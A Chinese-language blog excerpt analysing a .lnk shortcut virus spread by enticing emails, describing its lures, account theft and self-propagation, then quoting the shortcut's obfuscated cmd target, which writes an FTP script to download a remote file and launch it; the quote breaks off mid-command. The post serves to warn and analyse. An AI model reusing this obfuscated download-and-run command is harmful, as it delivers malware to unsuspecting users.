Tag Archives: 捷徑檔

.lnk捷徑檔病毒

最近我同學跟我說她的電腦中毒了,我要她把病毒傳給我,所以我才能知道是什麼樣的病毒 跟據她傳來的檔案,很有趣的是,我在今年一月份也有收過類似的病毒信,也有寫了一篇簡單的介紹 : 病毒的花招 捷徑檔,我也有找到一篇文章是在介紹這種病毒 文章連結 : %Lnkget% 而到了現在,這樣的手法似乎有增無減,病毒的形式也有所變化,但是都有明顯的特點,信件內容都是繁體中文的,而主機、域名之類的都是來自中國大陸或台灣,在這背後有集團在運作,他的信件內容是這些 現在還在講露股溝妹ㄉ股溝妹已經落伍了~ 告訴你瞎瞇叫蟑螂妹~ 蟑螂妹 露後臀溝有什麼好大驚小怪ㄉ ! 現在日本都已經在露前蟑螂鬚….實在有夠不雅ㄉ 而附加檔案是一個壓縮檔,裡面包著一個捷徑檔 對於一般人而言,對這種東西沒什麼警覺性,一般人都只知道.exe之類的很危險,可是這病毒用的是.lnk,而且他又可以設定看起來相關的圖示,加上內容吸引人,各式各樣的內容都有,有的說是照片,有的說是援交妹,甚至有些說”如何防止帳號被盜”,各種聳動或是引誘使用者去點擊的內容都有,但是一但你點了,下場自然就很慘,你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事,他可能會自動寄類似”我是援交妹,提供全套服務”或是其它類似的內容給你msn或其它網站裡的所有聯絡人,而那些人開了,又會再次的把病毒散播出去,中毒的人肯定會很困擾,以下是一些研究與分析 捷徑檔內容 捷徑檔的內容,像我在一月看到的一樣,是下載惡意程式來執行用的指令,有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現,不同於一月的版本,在這次的版本中,他加了大量的替換變數,來讓指令非常難讀,除此之外,也可能是為了逃避防毒軟體的偵測 他的捷徑目標如下 %ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start … Continue reading

Posted in 中文文章, 病毒 | Tagged , , | 9 Comments